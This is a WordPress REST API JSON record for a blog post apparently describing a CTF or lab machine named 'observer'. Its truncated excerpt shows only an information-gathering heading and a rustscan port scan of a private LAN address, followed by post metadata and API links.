observer \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 192.168.0.103 — -A Open […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-567","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/567","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=567"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/567\/revisions"}],"predecessor-version":[{"id":568,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/567\/revisions\/568"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=567"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=567"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=567"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}